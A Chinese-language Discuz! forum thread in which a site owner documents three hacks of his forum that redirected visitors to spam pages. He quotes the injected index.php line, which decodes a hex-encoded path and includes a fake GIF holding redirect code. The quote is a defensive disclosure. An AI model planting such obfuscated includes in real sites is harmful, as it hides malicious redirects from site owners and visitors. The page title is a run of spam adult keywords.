久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區

標題: 記錄這一年來自己論壇被黑跳轉垃圾網頁的問題 [打印本頁]

作者: lookbear 時間: 2020-3-23 20:51
標題: 記錄這一年來自己論壇被黑跳轉垃圾網頁的問題
DZ論壇現在已經是高危的程序
這可能跟多年不更新有關系，從來沒有哪個時候像今年一樣反復被黑！
目前已經開啟了 ESET殺毒軟件，希望不會了

在此寫下三次論壇網頁被修改的樣式，以備大家參考！

這三次被黑，表現都是訪問網頁會跳轉到垃圾頁面，但是都很隱蔽，有的會偶爾彈出，有的會選擇只在手機端彈出等等！

1. config/config_global.php 被篡改
在 config_global.php 文件底部會出現一些超長的不正常代碼，對比一下正版文件就可以發現異常

2..htaccess 文件被篡改，因為已經被刪除，記不得添加了哪兩句，自行對比下

3.前幾天的發生的， INDEX.PHP 被篡改。

@include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));

復制代碼

經過查詢，是執行一個

@include(PACK('H*','./static/image/common/noimg.gif'));

復制代碼

經過查詢，noimg.gif根本不是圖片，里邊存有跳轉代碼。

多事之秋，各種病毒泛濫，對于DZ這個老程序真是千瘡百孔，把這些分享給大家。因為就算你殺了毒，不找出被篡改的文件，也是枉然！

作者: 羅永浩 時間: 2020-3-24 02:14
想轉WP了，昨晚看了一晚上的主題先收藏起來，到時候移過來

作者: guessxiaohuang 時間: 2020-3-24 21:53
好像也沒錯哦，HTML5在國外已經被大量網站使用了，看了下discuz內部代碼，居然沒有跟進，的確慢慢的就落后了

作者: lemon 時間: 2020-3-24 22:29
牛逼網站時常被人掂記，我的網站5 6年都沒人來黑。

作者: Killer 時間: 2020-3-24 23:13
文件被修改基本都是服務器本身安全沒做好，而非DZ被黑，加強服務器安全防止被入侵是關鍵，不然任何程序都會被黑的

作者: 鴻茂傳媒 時間: 2020-3-25 11:10
服務器沒有做好安全。

作者: guessxiaohuang 時間: 2020-3-25 16:43

Killer 發表于 2020-3-24 23:13
文件被修改基本都是服務器本身安全沒做好，而非DZ被黑，加強服務器安全防止被入侵是關鍵，不然任何程序都會 ...

我贊同你的說法，discuz安全性我也測試過，99%的攻擊方法都沒什么用，他的這個應該是FTP密碼被別人知道了，然后被上傳木馬文件，他不徹底清除惡意代碼的話，就只能重裝了

作者: dss 時間: 2020-3-25 18:16
樓主用哪里的服務器建站？

作者: ill01 時間: 2020-4-25 17:49
提示: 作者被禁止或刪除內容自動屏蔽

作者: simonzhd 時間: 2020-4-26 11:10
說的我怕怕的

歡迎光臨 Discuz! 官方交流社區 (http://www.9999xn.com/)